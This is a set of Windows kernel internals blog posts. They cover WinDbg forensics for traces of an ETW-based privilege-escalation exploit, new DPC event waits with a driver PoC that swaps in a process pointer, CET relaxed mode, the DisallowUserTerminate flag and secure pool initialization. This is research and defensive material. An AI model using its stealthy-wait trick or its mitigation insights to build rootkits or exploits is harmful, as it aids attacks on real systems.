As expected, we can see here 3 GUIDs – the first one, that was already registered in the system the first time we checked, the second, which we are using for our exploit, and the test GUID, which we registered as part of our attempts.

Now we can use a second command to see the who is using these GUIDs. Unfortunately, there is no nice way to view the information for all GUIDs at once, so we’ll need to pick one at a time. When doing actual forensic analysis, you’d have to look at all the GUIDs (and probably write a tool to do this automatically), but since we know which GUID our exploit is using we’ll just focus on it.

We’ll save the GUID entry in slot 42:

dx -r0 @$exploitGuid = (nt!_ETW_GUID_ENTRY*)(@$GuidTable.Select(bucket => bucket.ListHead[@$etwNotificationGuid])[42].Flink)

And print the information about all the registered instances in the list:

dx -g @$regEntries = Debugger.Utility.Collections.FromListEntry(@$exploitGuid->RegListHead, "nt!_ETW_REG_ENTRY", "RegList").Select(r => new {ReplyQueue = r.ReplyQueue, ReplySlot = r.ReplySlot, UsedSlots = r.ReplySlot->Where(s => s != 0).Count(), Caller = r.Caller, SessionId = r.SessionId, Process = r.Process, ProcessName = ((char[15])r.Process->ImageFileName)->ToDisplayString("s"), Callback = r.Callback, CallbackContext = r.CallbackContext})

We can see that all instances are registered by the same process (conveniently named “exploit_part_1”). This fact by itself is suspicious, since usually a process will not have a reason to register the same GUID more than once and tells us we should probably look further into this.

If we want to investigate these suspicious entries a bit more, we can look at one of the notification queues:

dx -g @$regEntries[0].ReplySlot

These look even more suspicious – their Flags are ETW_QUEUE_ENTRY_FLAG_HAS_REPLY_OBJECT (2) but their ReplyObject fields don’t look right – they are not aligned the way objects are supposed to be.

We can run !pool on one of the objects and see that this address is actually somewhere inside a token object:

And if we check the address of the token belonging to the exploit_part_1 process:

dx @$regEntries[0].Process->Token.Object & ~0xf
@$regEntries[0].Process->Token.Object & ~0xf : 0xffff908912ded0a0
? 0xffff908912ded112 - 0xffff908912ded0a0
Evaluate expression: 114 = 00000000`00000072

We’ll see that the address we see in the first ReplyObject is 0x72 bytes after the token address, so it is inside this process’ token. Since a ReplyObject should be pointing to an ETW registration object, and definitely not somewhere in the middle of a token, this is obviously pointing towards some suspicious behavior done by this process.

Show Me The Code

The full PoC can be found in the GitHub repository.

Conclusion

One of the things I wanted to show in this blog post is that there is almost no such thing as a “simple” exploit anymore. And 5000 words later, I think this point should be clear enough. Even a vulnerability like this, which is pretty easy to understand and very easy to trigger, still takes a significant amount of work and understanding of internal Windows mechanisms to turn into an exploit that doesn’t immediately crash the system, and even more work to do anything useful with.

That being said, these kinds of exploits are the most fun — because they don’t rely on any ROP or HVCI violations, and have nothing to do with XFG or CET or page tables or PatchGuard. Simple, effective, data-only attacks, will always be the Achille’s heel of the security industry, and will most likely always exist in some form.

This post focused on how we can safely exploit this vulnerability, but once we got our privileges, we did pretty standard stuff with them. In future posts, I might showcase some other interesting things to do with arbitrary increments and token objects, which are more interesting and complicated, and maybe make attacks harder to detect too.

Read our other blog posts:

DPWs are the new DPCs : Deferred Procedure Waits in Windows 10 21H1

With the Windows 21H1 (Iron/“Fe”) feature complete deadline looming, the last few Dev Channel builds have had some very interesting changes and additions, which will probably require a few separate blog posts to cover fully. One of those was in a surprising part of the code – object wait dispatching.

The new build introduced a few new functions:

  • KeRegisterObjectDpc (despite the name, it’s an internal non-exported function)
  • ExQueueDpcEventWait
  • ExCancelDpcEventWait
  • ExCreateDpcEvent
  • ExDeleteDpcEvent

All those functions are part of a new and interesting functionality – the ability to wait on an (event) object and to execute a DPC when it becomes signaled. Until now, if a driver wanted to wait on an object it had to do so synchronously – the current thread would be put in a wait state until the object that is waited on was signaled, or the wait timed out (or an APC executed, if the wait was alertable). User mode applications typically perform waits in the same manner, however, since Windows 8, they’ve also have had the ability to perform asynchronous waits through the Thread Pool API. This new functionality associates an I/O Completion Port with a “Wait Packet”, obviating the need to have a waiting thread.

The change in 21H1, through the addition of these APIs, marks a major change for kernel-mode waits by introducing kernel-mode asynchronous waits: a driver can now supply a DPC that will be executed when the event object that is waited on is signaled all while continuing its execution in the meantime.

The Mechanism

To use this new capability, a driver must first  initialize a so-called “DPC Event”. To initialize this structure we have the new API ExCreateDpcEvent:

NTSTATUS
ExCreateDpcEvent (
    _Outptr_ PVOID *DpcEvent,
    _Outptr_ PKEVENT *Event,
    _In_ PKDPC Dpc
);

Internally, this allocates a new undocumented structure that I chose to call DPC_WAIT_EVENT:

typedef struct _DPC_WAIT_EVENT
{
    KWAIT_BLOCK WaitBlock;
    PKDPC Dpc;
    PKEVENT Event;
} DPC_WAIT_EVENT, *PDPC_WAIT_EVENT;

This API receives a DPC that the caller must have previously initialized with KeInitializeDpc (you can guess who spent a day debugging things by forgetting to do this), and in turn creates an event object and allocates a DPC_WAIT_EVENT structure that is returned to the caller, filling in a pointer to the caller’s DPC, the newly allocated event, and setting the wait block state to WaitBlockInactive.

Then, the driver needs to call the new ExQueueDpcEventWait function, passing in the structure:

BOOLEAN
ExQueueDpcEventWait (
    _In_ PDPC_WAIT_EVENT DpcEvent,
    _In_ BOOLEAN QueueIfSignaled
    )
{
    if (DpcEvent->WaitBlock.BlockState != WaitBlockInactive)
    {
        RtlFailFast(FAST_FAIL_INVALID_ARG);
    }
    return KeRegisterObjectDpc(DpcEvent->Event,
                               DpcEvent->Dpc,
                               &DpcEvent->WaitBlock,
                               QueueIfSignaled);
}

As can be seen, this function is very simple – it unpacks the structure and sends the contents to the internal KeRegisterObjectDpc:

BOOLEAN
KeRegisterObjectDpc (
    _In_ PVOID Object,
    _In_ PRKDPC Dpc,
    _In_ PKWAIT_BLOCK WaitBlock,
    _In_ BOOLEAN QueueIfSignaled
);

You might wonder, like me – doesn’t the “e” in “Ke” stand for “exported”? Was I lied to the whole time? Is this a mistake? Was this a last minute change? Does MS not have any design or code review? I’m as confused as you are.

But before talking about KeRegisterObjectDpc, we need to investigate another small detail. To enable this functionality, the KWAIT_BLOCK structure can now store a KDPC to queue, and the WAIT_TYPE enumeration has a new WaitDpc option:

typedef struct _KWAIT_BLOCK
{
    LIST_ENTRY WaitListEntry;
    UCHAR WaitType;
    volatile UCHAR BlockState;
    USHORT WaitKey;
#if defined(_WIN64)
    LONG SpareLong;
#endif
    union {
        struct KTHREAD* Thread;
        struct KQUEUE* NotificationQueue;
        struct KDPC* Dpc;
    };
    PVOID Object;
    PVOID SparePtr;
} KWAIT_BLOCK, *PKWAIT_BLOCK, *PRKWAIT_BLOCK;

typedef enum _WAIT_TYPE
{
    WaitAll,
    WaitAny,
    WaitNotification,
    WaitDequeue,
    WaitDpc,
} WAIT_TYPE;

Now we can look at KeRegisterObjectDpc, which is pretty simple and does the following:

  1. Initializes the wait block
    1. Sets the BlockState field to WaitBlockActive,
    2. Sets the WaitType field to WaitDpc
    3. Sets the Dpc field to point to the received DPC
    4. Sets the Object field to the received object.
  2. Raises the IRQL to DISPATCH_LEVEL
  3. Acquires the lock for the object, found in its DISPATCHER_HEADER.
  4. If the object is not signaled – inserts the wait block into the wait list for the object and releases the lock, then lowers the IRQL
  5. Otherwise, if the object is signaled:
    1. Satisfies the wait for the object, resetting the signal state as required for the object
    2. If the QueueIfSignaled parameter was set, goes to step 3
    3. Otherwise,
      1. Sets BlockState to WaitBlockInactive
      2. Queues the DPC
  • Releases the lock and calls KiExitDispatcher (which will lower the IRQL and make the DPC execute immediately).

Then the function returns. If the object was not signaled, the driver execution will continue and when the object gets signaled, the DPC will be executed. If the object is already signaled, the DPC will be executed immediately (unless the QueueIfSignaled parameter was set to TRUE)

If the wait is no longer needed, the driver should call ExCancelDpcEventWait to remove the wait block from the wait queue. And when the event is not needed it should call ExDeleteDpcEvent to dereference the event and free the opaque DPC_WAIT_EVENT structure.

Meanwhile, the various internal dispatcher functions that take care of signaling an object have been extended to handle the WaitDpc case – instead of unwaiting the thread (WaitAny/WaitAll), or waking up a queue waiter (WaitNotification), a call to KeInsertQueueDpc is now done for the WaitDpc case (since wait satisfaction is done at DISPATCH_LEVEL, the DPC will then immediately execute once KiExitDispatcher is called by one of these functions).

The Limitations

You might have noticed that while the functionality in KeRegisterObjectDpc is generic, all these structures and exported functions  only support an event object. Furthermore, when looking inside ExCreateDpcEvent, we can see that it only creates an event object:

status = ObCreateObject(KernelMode,
                        ExEventObjectType,
                        NULL,
                        KernelMode,
                        NULL,
                        sizeof(KEVENT),
                        0,
                        0,
                        &event);

But as KeRegisterObjectDpc suggests, an event is not the only object that can be asynchronously waited on. The usage of KiWaitSatisfyOther suggests that any generic dispatcher object, except for mutexes, which need to handle ownership rules, can be used. Since a driver might need to wait on a process, a thread, a semaphore, or any other object — why are we only allowed to wait on an event here?

The answer in this case is probably that this was not designed to be a generic feature available to all drivers. So far, I could only see one Windows component calling these new functions – Vid.sys (the Hyper-V Virtualization Infrastructure Driver) Digging deeper, it looks like it is using this new capability to implement the new WHvCreateTrigger  API added to the documented Hyper-V Platform API in WinHvPlatform.h. “Triggers” are a new exposed 21H1 functionality to send virtual interrupts to a Hyper-V Partition. The importance of Microsoft’s Azure/Hyper-V platform play is clearly evident here – low level changes to the kernel dispatcher, for the first time in a decade, simply to optimize the performance of virtual machine-related APIs.

As such, since it is only designed to support this one specific case, this feature is built to only wait on an event object. But even with that in mind, the design is a bit funny – ExCreateDpcEvent will create an event object and return it to the caller, which then has to re-open it with ObOpenObjectByPointer to use it in any way, since most wait-related APIs require a HANDLE (as does exposing the object to user-mode, as Vid.sys intends to do). And we can see vid.sys doing exactly that:

Why not simply expose KeRegisterObjectDpc and let it receive an object pointer that will be waited on, since this function doesn’t care about the object type? Why do we even need a new structure to manage this information? I don’t know. The current implementation doesn’t seem like the most logical one, and it limits the feature significantly, but it is the Microsoft way.

If I had to guess, I would expect to see this feature changing in the future to support more object types as Microsoft internally finds more uses for asynchronous waits in the kernel. I will not be surprised to see an ExQueueDpcEventWaitEx function added soon… and perhaps documenting this API to 3rd parties.

But not all is lost. If you’re willing to bend the rules a little and upset a few people in the OSR forums, you can wait on any non-mutex (dispatcher) object you want, simply by replacing the pointer inside the DPC_WAIT_EVENT structure that is returned back to you. Neither ExQueueDpcEventWait or KeRegisterObjectDpc care about which type of object is being passed in, as long as it’s a legitimate dispatcher object. I’m sure there’s an NT_ASSERT in the checked build, but it’s not like those still exist.

The risk here (as OSR people will gladly tell you) is that the new structure is undocumented and might change with no warning, as are the functions handling it. So, replacing the pointer and hoping that the offset hasn’t changed and that the functions will not be affected by this change is a risky choice that is not recommended in a production environment. Now that I’ve said it, I have no doubt we will see crash dumps caused by AV products attempting to do exactly that, poorly.

PoC

To demonstrate how this mechanism works and how it can be used for objects other than events I wrote a small driver that registers a DPC that waits for a process to terminate.

On DriverEntry, this driver initializes a push lock that will be used later. It also registers a process creation callback:

NTSTATUS
DriverEntry (
    _In_ PDRIVER_OBJECT DriverObject,
    _In_ PUNICODE_STRING RegistryPath
    )
{
    DriverObject->DriverUnload = DriverUnload;
    ExInitializePushLock(&g_WaitLock);
    return PsSetCreateProcessNotifyRoutineEx(&CreateProcessNotifyRoutineEx, FALSE);
}

Whenever our CreateProcessNotifyRoutineEx callback is called, it checks if the new process name ends with “cmd.exe”:

VOID
CreateProcessNotifyRoutineEx (
    _In_ PEPROCESS Process,
    _In_ HANDLE ProcessId,
    _In_ PPS_CREATE_NOTIFY_INFO CreateInfo
    )
{
    NTSTATUS status;
    DECLARE_CONST_UNICODE_STRING(cmdString, L"cmd.exe");

    UNREFERENCED_PARAMETER(ProcessId);

    //
    // If process name is cmd.exe, create a dpc
    // that will wait for the process to terminate
    //
    if ((!CreateInfo) ||
        (!RtlSuffixUnicodeString(&cmdString, CreateInfo->ImageFileName, FALSE)))
    {
        return;
    }
    ...
}

If the process is cmd.exe, we will create a DPC_WAIT_EVENT structure that will wait for the process to be signaled, which happens when the process terminates. For the purpose of this PoC I wanted to keep things simple and avoid having to keep track of multiple wait blocks. So only the first cmd.exe process will be waited on and the rest will be ignored.

First, we need to declare some global variables for the important structures, as well as the lock that we initialized on DriverEntry and the DPC routine that will be called when the process terminates:

static KDEFERRED_ROUTINE DpcRoutine;
PDPC_WAIT_EVENT g_DpcWait;
EX_PUSH_LOCK g_WaitLock;
KDPC g_Dpc;
PKEVENT g_Event;

static
void
DpcRoutine (
    _In_ PKDPC Dpc,
    _In_ PVOID DeferredContext,
    _In_ PVOID SystemArgument1,
    _In_ PVOID SystemArgument2
    )
{
    DbgPrintEx(DPFLTR_IHVDRIVER_ID,
               DPFLTR_ERROR_LEVEL,
               "Process terminated\n");
}

Then, back in our process creation callback, we will initialize the DPC object and allocate a DPC_WAIT_EVENT structure using KeInitializeDpc and ExCreateDpcEvent. To avoid a race we will use our lock.

void
CreateProcessNotifyRoutineEx (
    ...
    )
{
    ...
    ExAcquirePushLockExclusive(&g_WaitLock);
    if (g_DpcWait == nullptr)
    {
        KeInitializeDpc(&g_Dpc, DpcRoutine, &g_Dpc);
        status = ExCreateDpcEvent(&g_DpcWait,&g_Event,&g_Dpc);
        if (!NT_SUCCESS(status))
        {
            DbgPrintEx(DPFLTR_IHVDRIVER_ID,
                       DPFLTR_ERROR_LEVEL,
                       "ExCreateDpcEvent failed with status: 0x%x\n",
                       status);
            ExReleasePushLockExclusive(&g_WaitLock);
            return;
        }
        ...
    }
    ExReleasePushLockExclusive(&g_WaitLock);
}

ExCreateDpcEvent creates an event object and places a pointer to it in our new DPC_WAIT_EVENT structure. But since we want to wait on a process, we need to replace that event pointer with the pointer to the EPROCESS of the new Cmd.exe process. Then we can go on to queue our wait block for the process:

void
CreateProcessNotifyRoutineEx (
    _In_ PEPROCESS Process,
    ...
    )
{
    NTSTATUS status;
    //
    // Only wait on one process
    //
    ExAcquirePushLockExclusive(&g_WaitLock);
    if (g_DpcWait == nullptr)
    {
        KeInitializeDpc(&g_Dpc, DpcRoutine, &g_Dpc);
        status = ExCreateDpcEvent(&g_DpcWait, &g_Event, &g_Dpc);
        if (!NT_SUCCESS(status))
        {
            DbgPrintEx(DPFLTR_IHVDRIVER_ID,
                       DPFLTR_ERROR_LEVEL,
                       "ExCreateDpcEvent failed with status: 0x%x\n",
                       status);
            ExReleasePushLockExclusive(&g_WaitLock);
            return;
        }
        NT_ASSERT(g_DpcWait->Object == g_Event);
        g_DpcWait->Object = (PVOID)Process;
        ExQueueDpcEventWait(g_DpcWait, TRUE);
    }
    ExReleasePushLockExclusive(&g_WaitLock);
}

And that’s it! When the process terminates our DPC routine will be called, and we can choose to do whatever we want there:

The only other thing we need to remember is to clean up after ourselves before unloading, by setting the pointer back to the event (that we saved for that purpose), canceling the wait and deleting the DPC_WAIT_EVENT structure:

VOID
DriverUnload (
    _In_ PDRIVER_OBJECT DriverObject
    )
{
    UNREFERENCED_PARAMETER(DriverObject);

    PsSetCreateProcessNotifyRoutineEx(&CreateProcessNotifyRoutineEx, TRUE);

    //
    // Change the DPC_WAIT_EVENT structure to point back to the event,
    // cancel the wait and destroy the structure
    //
    if (g_DpcWait != nullptr)
    {
        g_DpcWait->Object = g_Event;
        ExCancelDpcEventWait(g_DpcWait);
        ExDeleteDpcEvent(g_DpcWait);
    }
}

Forensics

Apart from the legitimate uses of asynchronous wait for drivers, this is also a new and stealthy way to wait on all different kinds of objects without using other, more well-known ways that are easy to notice and detect, such as using process callbacks to wait on process termination.

The main way to detect whether someone is using this technique is to inspect the wait queues of objects in the system. For example, let’s use the Windbg Debugger Data Model to inspect the wait queues of all processes in the system. To get a nice table view we’ll only show the first wait block for each process, though of course that doesn’t give us the full picture:

dx -g @$procWaits = @$cursession.Processes.Where(p => (__int64)&p.KernelObject.Pcb.Header.WaitListHead != (__int64)p.KernelObject.Pcb.Header.WaitListHead.Flink).Select(p => Debugger.Utility.Collections.FromListEntry(p.KernelObject.Pcb.Header.WaitListHead, "nt!_KWAIT_BLOCK", "WaitListEntry")[0]).Select(p => new { WaitType = p.WaitType, BlockState = p.BlockState, Thread = p.Thread, Dpc = p.Dpc, Object = p.Object, Name = ((char*)((nt!_EPROCESS*)p.Object)->ImageFileName).ToDisplayString("sb")})

We mostly see here waits of type WaitNotification (2), which is what we expect to see – user-mode threads asynchronously waiting for processes to exit. Now let’s run our driver and run a new query which will only pick processes that have wait blocks with type WaitDpc (4):

dx @$dpcwaits = @$cursession.Processes.Where(p => (__int64)&p.KernelObject.Pcb.Header.WaitListHead != (__int64)p.KernelObject.Pcb.Header.WaitListHead.Flink && Debugger.Utility.Collections.FromListEntry(p.KernelObject.Pcb.Header.WaitListHead, "nt!_KWAIT_BLOCK", "WaitListEntry").Where(p => p.WaitType == 4).Count() != 0)

[0x6b0]          : cmd.exe [Switch To]

Now we only get one result – the cmd.exe process that our driver is waiting on. Now we can dump its whole wait queue and see who is waiting on it. We will also use a little helper function to show us the symbol that the DPC’s DeferredRoutine is pointing to:

dx -r0 @$getsym = (x => Debugger.Utility.Control.ExecuteCommand(".printf\"%y\", " + ((__int64)x).ToDisplayString("x")))

dx -g Debugger.Utility.Collections.FromListEntry(@$dpcwaits.First().KernelObject.Pcb.Header.WaitListHead, "nt!_KWAIT_BLOCK", "WaitListEntry").Select(p => new { WaitType = p.WaitType, BlockState = p.BlockState, Thread = p.Thread, Dpc = p.Dpc, Object = p.Object, Name = ((char*)((nt!_EPROCESS*)p.Object)->ImageFileName).ToDisplayString("sb"), DpcTarget = (@$getsym(p.Dpc->DeferredRoutine))[0]})

Only one wait block is queued for this process and its pointing to our driver!

This analysis process can also be converted to JavaScript to have a bit more control over the presentation of the results, or to C to automatically check the wait queues of different objects (keep in mind it is extremely unsafe to do this at runtime due to the lock synchronization required – using the COM/C++ Debugger API to do forensics on a memory dump or live dump is the preferred way to go).

Conclusion

This new addition to the Windows kernel is exciting since it allows the option of asynchronous waits for drivers, a capability that only existed for user-mode until now. I hope we will see this extended to properly support more object types soon, making this feature generically useful to all drivers in various cases.

The implementation of all the functions discussed in this post can be found here.

Read our other blog posts:

CET Updates – CET on Xanax

Windows 21H1 CET Improvements

Since Alex and I first published our first analysis of CET, Windows’ support for user-mode CET received a few important changes that should be noted. We can easily spot most of them by looking at the changes to the MitigationFlags2 field of the EPROCESS, when comparing Windows 10 Build 19013 with 20226:

There are a lot of new mitigation flags here, and a few of them are related to CET:

  • CetUserShadowStackStrictMode – annoyingly, this does not mean the same thing as Strict CFG. Strict CET means that CET will be enforced for the process, regardless of whether it’s compiled as CET compatible or not.
  • BlockNonCetBinaries – as the name suggests, this feature blocks binaries that were not compiled with CET support from being loaded into the process — just like Strict CFG.
  • CetDynamicApisOutOfProcOnly – At first CET was supposed to block all non-approved RIP changes. That was too much, so it was toned down to only block most non-approved RIP targets. Then MS remembered dynamic memory, and couldn’t force dynamic memory to comply with CET but insisted that allowing dynamic targets was only supported out of proc, so not really a security risk. And now it seems that in proc dynamic APIs are allowed by default and processes have to manually opt-out of that by setting this flag. In their defense, the flag is already set for most important Windows processes such as winlogon.exe, lsass.exe, csrss.exe and svchost.exe. But I’m sure that’s OK and we’ll never see CET bypasses abusing dynamic APIs in proc.
  • UserCetSetContextIpValidationRelaxedMode – Even after all the adjustments that were made in order to not break any existing code, CET was still a bit too anxious, resulting in this new mitigation. This new flag has a pretty curious name that might draw your attention. If it did – good! Because this is the CET feature that this blog post will focus on.

But even without knowing the purpose of any of those, the amount of new CET flags alone hints that this we are not expected to see CET being fully enforced across the system any time soon.

Relaxed Mode

The least obvious of those new flags in the “relaxed mode” option. Was CET too anxious to handle 2020 and needed a bit of a break from everything? Well if it did, I think we can all relate to that and shouldn’t judge to harshly.

This flag can be set on process creation, by calling UpdateProcThreadAttribute with PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY and PROCESS_CREATION_MITIGATION_POLICY2_USER_CET_SET_CONTEXT_IP_VALIDATION_RELAXED_MODE as the mitigation policy flag.

It can also be set with a currently-undocumented linker flag, which will set the new IMAGE_DLLCHARACTERISTICS_EX_CET_SET_CONTEXT_IP_VALIDATION_RELAXED_MODE value in the PE header information (see the end of the post for the definition).

Once the flag is set, it is only used in two places – KeVerifyContextIpForUserCet and KiContinuePreviousModeUser. Both read it from the EPROCESS and pass a Boolean value into KiVerifyContextIpForUserCet to indicate whether it’s enabled or not. Inside KiVerifyContextIpForUserCet we can see this new addition that checks this argument:

RtlZeroMemory(&unwindState, sizeof(unwindState));
if (continueType == KCONTINUE_UNWIND)
{
    status = RtlVerifyUserUnwindTarget(userRip, KCONTINUE_UNWIND, &unwindState);
    if (NT_SUCCESS(status))
    {
        return status;
    }
}

if ((RelaxedMode != FALSE) && (continueType != KCONTINUE_RESUME))
{
    if (unwindState.CheckedLoadConfig == FALSE)
    {
        status = RtlGetImageBaseAndLoadConfig(userRip, &unwindState.ImageBase, &unwindState.LoadConfig);
        unwindState.CheckedLoadConfig = NT_SUCCESS(status) ? TRUE : unwindState.CheckedLoadConfig;
    }

    if (unwindState.CheckedLoadConfig != FALSE)
    {
        if (unwindState.ImageBase != NULL)
        {
            __try
            {
                ProbeForRead(unwindState.LoadConfig,
                             RTL_SIZEOF_THROUGH_FIELD(IMAGE_LOAD_CONFIG_DIRECTORY64, GuardEHContinuationCount),
                             sizeof(UCHAR));

                if ((unwindState.LoadConfig != NULL) &&
                    (unwindState.LoadConfig->Size >= RTL_SIZEOF_THROUGH_FIELD(IMAGE_LOAD_CONFIG_DIRECTORY64, GuardEHContinuationCount)) &&
                    (BooleanFlagOn(unwindState.LoadConfig->GuardFlags, IMAGE_GUARD_EH_CONTINUATION_TABLE_PRESENT)))
                {
                    goto CheckAddressInShadowStack;
                }
            }
            __except
            {
                goto CheckAddressInShadowStack;
            }
            return STATUS_SUCCESS;
        }
        return STATUS_SUCCESS;
    }
}

At first look, this might seem like a lot and could be confusing. But with some context it becomes a lot clearer. When implementing CET support, Microsoft ran into a problem. NtSetContextThread is widely used across the system by processes that don’t necessarily respect the new “rules” of CET, and might use it to set RIP to addresses that are not found in the shadow stack. Those processes might also unwind into addresses that are not considered valid by CET, and since they were not compiled with proper CET support they will not have Static nor Dynamic Exception Handler Continuation Targets (which we wrote about in the previous post) that are recognized by CET. It won’t be possible to enable CET across the system without breaking all those processes, some of which, like python, are very common. So, an option was added to “relax” CetSetContextIpValidation for those cases.

This check will be done for 2 continue types – all cases of KCONTINUE_SET, and cases of KCONTINUE_UNWIND where RtlVerifyUserUnwindTarget failed.

To know whether we are looking at such a case, KiVerifyContextIpForUserCet reads the IMAGE_LOAD_CONFIG_DIRECTORY structure from the headers of the module that contains the new RIP value. If the module has no image base, no load config or no Exception Handler Continuation Table, the function assumes that this is a module that is incompatible with CET and allows the action. But if the module has as Exception Handler Continuation Table, the new RIP value will be checked against the shadow stack, just as if relaxed mode would not have been enabled.

A fun side effect of this is that for any process where “relaxed mode” is enabled, setting the context or unwinding into JIT’ed code will always be permitted.

Load Config Directory Capturing

As part of this change MS also added a new UNWIND_STATE structure (that is our name, as this new structure is not in the public symbols) to hold the load configuration pointer and avoid reading the headers more than once. The new structure looks like this:

struct _UNWIND_STATE
{
    PVOID ImageBase;
    PIMAGE_LOAD_CONFIG_DIRECTORY64 LoadConfig;
    BOOLEAN CheckedLoadConfig;
} UNWIND_STATE, *PUNWIND_STATE;

The CheckedLoadConfig flag is used to indicate that the LoadConfig pointer is already initialized that does not need to be read again. We’ll leave it as an excercise for the reader as to why this change was introduced.

Forward-thinking Downgrades

As hardware supporting CET is about the be released and hopefully become common over the next few years, the Windows implementation of CET doesn’t seem to be fully prepared for the change and it looks like new challenges are only being discovered now. And judging by these “reserved” image flags, it seems that some developers are expecting more CET changes and downgrades in the future…

Read our other blog posts:

Critical, Protected, DUT Processes in Windows 10

We are all familiar with Microsoft’s love for creating new and exciting ways to prevent certain processes from being terminated by the user. First were Critical processes in Windows XP 64-bit and Server 2003, which crashed the kernel if you killed them. Then, came Protected Process Light (PPL) in Windows 8.1, which prevented you from killing them at all.  Perhaps it prevented too many other things too, because in a recent Windows 10 update, build 20161, we see yet another new addition to the EPROCESS flags (Flags3, actually), called DisallowUserTerminate:

As this flag’s name is pretty clear, its purpose doesn’t need much explanation – any process that has this flag set cannot be terminated from user-mode. We can see that in PspProcessOpen:

A user-mode caller can’t open a handle to a process that has the DisallowUserTerminate flag set if the requested access mask contains PROCESS_TERMINATE.

So where is this flag set, and does this mean you can protect your processes from termination? The answer to the second question is simple – not really. For now, this flag can only be set by one path, and it’s one specifically used for creating Hyper-V Memory Host (vmmem) processes.

Internally, this flag is set on process creation by PspAllocateProcess, based on the input parameter CreateFlags – flag 8 (let’s call it PSP_CREATE_PROCESS_FLAG_DISALLOW_TERMINATE) is what sets DisallowUserTerminate as you can see below:

Unfortunately, this function only has 2 external callers, which always pass in 0 as CreateFlags, which obviously doesn’t allow one to set any of these flags. The third, internal caller, is PsCreateMinimalProcess, which has a few internal uses in the system, such as the creation of Pico Processes used by WSL, and other special system processes such as “Memory Compression” and “Registry”. Minimal processes are also created by VmCreateMemoryProcesses, which is one of the APIs that’s exported through the VID Extension Host that myself, Gabrielle, and Alex described in our INFILTRATE 2020 talk.

Unlike the exported functions, the PsCreateMimimalProcess internal API receives the CreateFlags from its callers and forwards them to PspAllocateProcess, and VmCreateMemoryProcesses passes in PSP_CREATE_PROCESS_FLAG_DISALLOW_TERMINATE (0x8) unconditionally, as well as PSP_CREATE_PROCESS_FLAG_VM_PROCESSOR_HOST (0x4) if flag 0x20 (let’s call it VMP_CREATE_PROCESS_FLAG_VM_PROCESSOR_HOST) was sent to it. You can see this logic below:

As mentioned, looking for callers for this function in IDA will not show any results, because this function, which is not exported, is shared with Vid.sys through an extension host and called by VsmmNtSlatMemoryProcessCreate when new vmmem processes are needed to manage memory in virtual machines managed by Hyper-V, and/or to contain the Virtual Processor (VP) scheduler threads when eXtended Scheduling (XS) is enabled as part of Windows Defender Application Guard (WDAG), Windows Containers, or Windows Sandbox.

Checking the value of Flags3 in vmmem processes in the new build shows that DisallowUserTerminate is enabled for these processes, and:

Sadly, no other process can use this capability for now without manually editing the EPROCESS structure, which is extremely not recommended, as any code doing this is bound to break often and crash a lot of systems. So I’m sure 5 different AV companies are already adding code to it.

 

Read our other blog posts:

Secure Pool Internals : Dynamic KDP Behind The Hood

Starting with Windows 10 Redstone 5 (Version 1809, Build 17763), a lot has changed in the kernel pool. We won’t talk about most of these changes, that will happen in a 70-something page paper that will be published at some point in the future when we can find enough time and ADHD meds to finish it.

One of the more exciting changes, which is being added in Version 2104 and above, is a new type of pool – the secure pool. In short, the secure pool is a pool managed by Securekernel.exe, which operates in Virtual Trust Level 1 (VTL 1), and that cannot be directly modified by anything running in VTL 0. The idea is to allow drivers to keep sensitive information in a location where it is safe from tampering, even by other drivers. Dave Weston first announced this feature, marketed as Kernel Data Protection (KDP), at his BlueHat Shanghai talk in 2019 and Microsoft recently published a blog post presenting it and some of its internal details.

Note that there are two parts to the full KDP implementation: Static KDP, which refers to protecting read-only data sections in driver images, and Dynamic KDP, which refers to the secure pool, the topic of our blog post, which will talk about how to use this new pool and some implementation details, but will not discuss the general implementation of heaps or any of their components that are not specific to the secure pool.

We’ll also mention three separate design flaw vulnerabilities that were found in the original implementation in Build 20124, which were all fixed in 20161. These were identified and fixed through Microsoft’s great Windows Insider Preview Bug Bounty Program for $20000 USD each.

Initialization 

The changes added for this new pool start at boot. In MiInitSystem we can now see a new check for bit 15 in MiFlags, which checks if secure pool is enabled on this machine. Since MI_FLAGS is now in the symbol files, we can see that it corresponds to:

+0x000 StrongPageIdentity : Pos 15, 1 Bit

which is how the kernel knows that Virtualization Based Security (VBS) is enabled on a system with Secondary Level Address Table (SLAT) support. This allows the usage of Extended Page Table Entries (EPTEs) to add an additional, hypervisor-managed, layer of protection around physical memory. This is exactly what the secure pool will be relying on.

If the bit is set, MmInitSystem calls VslInitializeSecurePool, passing in MiState.Vs.SystemVaRegions[MiVaSecureNonPagedPool].BaseAddress:

If we compare the symbol files and look at the MI_SYSTEM_VA_TYPE enum, we’ll in fact see that a new member was added with a value of 15:MiVaSecureNonPagedPool:

VslInitializeSecurePool initializes an internal structure sized 0x68 bytes with parameters for the secure call. This structure contains information used to make the secure call, such as the service code to be invoked and up to 12 parameters to be sent to Securekernel. In this case only 2 parameters are used – the requested size for the secure pool (512 GB) and a pointer to receive its base address:

It also initializes global variables SecurePoolBase and SecurePoolEnd, which will be used to validate secure pool handle (more on that later). Then it calls VslpEnterIumSecureMode to call into SecureKernel, which will initialize the secure pool itself, passing in the secureCallParams structure that contains that requested parameters. Before Alex’s blog went down, he was working on an interesting series of posts on how the VTL 0 <-> VTL 1 communication infrastructure works, and hopefully it will return at some point, so we’ll skip the details here.

Securekernel unpacks the input parameters, finds the right path for the call, and eventually gets us to SkmmInitializeSecurePool. This function calls SecurePoolMgrInitialize, which does a few checks before initializing the pool.

First it validates that the input parameter SecurePoolBase is not zero and that it is aligned to 16 MB. Then it checks that the secure pool was not already initialized by checking if the global variable SecurePoolBaseAddress is empty:

The next check is for the size. If the supplied size is larger than 256 GB, the function ignores the supplied size and sets it to 256 GB. This is explained in the blog post from Microsoft linked earlier, where the secure kernel is shown to use a 256 GB region for the kernel’s 512 GB range. It’s quote curious that this is done by having the caller supply 512 GB as a size, and the secure kernel ignoring the parameter and overriding it with 256.

Once these checks are done SkmmInitializeSecurePool starts initializing the secure pool. It reserves a Normal Address Range (NAR) descriptor for the address range with SkmiReserveNar and then creates an initial pool descriptor and sets global variables SkmiSecurePoolStart and SkmiSecurePoolNar. Notice that the secure pool has a fixed, hard-coded address in 0xFFFF9B0000000000:

Side note: NAR stands for Normal Address Range. It’s a data structure tracking kernel address space, like VADs are used for user-space memory. Windows Internals, 7th Edition, Part 2, has an amazing section on the secure kernel written by Andrea Allevi.

